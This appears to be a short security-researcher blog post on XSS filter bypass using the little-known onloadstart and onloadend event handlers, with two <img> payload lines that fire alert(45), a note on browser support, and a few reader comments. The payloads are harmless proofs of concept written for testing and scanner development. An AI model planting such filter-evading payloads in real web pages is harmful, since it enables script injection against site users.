Hi hackers.
Last time I wrote about onpointer * xss, I write a not well-known event-handle for xss now.
(https://www.hahwul.com/2019/07/onpoint-xss-payload-for-bypass-xss-protection.html)

onload* event handler for XSS

it’s onload* handler!
Handlers that usually start with onload are well known, but onloadstart and onloadend are not well known.

<!-- onloadstart -->
<!-- Any browser, but not use <img> tag.. -->
<img src="https://1.bp.blogspot.com/-VkTsdecsLiI/XQOmG8rqvyI/AAAAAAAAEPk/9XBkwoAfmXE1KSHlqwF5cROFfgxUtDF_gCLcBGAs/s640/hahwul.gif" onloadstart="alert(45)">

<!-- onloadend -->
<!-- only firefox -->
<img src="https://1.bp.blogspot.com/-VkTsdecsLiI/XQOmG8rqvyI/AAAAAAAAEPk/9XBkwoAfmXE1KSHlqwF5cROFfgxUtDF_gCLcBGAs/s640/hahwul.gif" onloadend="alert(45)">

onloadstar tested my site. it's work!


But, just only in Firefox.

for XSpear

add eventhandler pattern!
https://github.com/hahwul/XSpear/issues/18

You're welcome
(img refer giphy.com)

댓글 6개:

  1. Excuse me, do you take illegal infiltration?

    답글삭제
    답글
    1. no, never.
      I'm not interested in such inquiries.

      삭제
  2. 안녕하세요 여쭤보고 싶은게 있어서 이렇게 실례드립니다.
    다름이 아니라 제가 스포츠 분석을 하는데 요즘 카카오플러스친구? 그걸로 제사칭을 하는 사람이 있는데 제가 카카오플러스친구를 만들어봐도 그사람이 최상단에 있어서 막을방법이나 제가 위로 올라가는 방법이 궁금해서 댓글달았습니다.
    아시는부분 있으시면 알려주시면 감사하겠습니다.

    답글삭제
    답글
    1. 카카오쪽으로 문의하시는거 외에는 특별히 방법은 없어보입니다. (사칭인 케이스라면 그게 가장 정상적인 대응방안으로 보여요)

      삭제
  3. onloadstart: anybrowser (https://developer.mozilla.org/en-US/docs/Web/API/GlobalEventHandlers/onloadstart)
    onloadend: only firefox (https://developer.mozilla.org/en-US/docs/Web/API/GlobalEventHandlers/onloadend)

    thanks rizal
    https://twitter.com/sayadarijawa/status/1159018094439698432

    답글삭제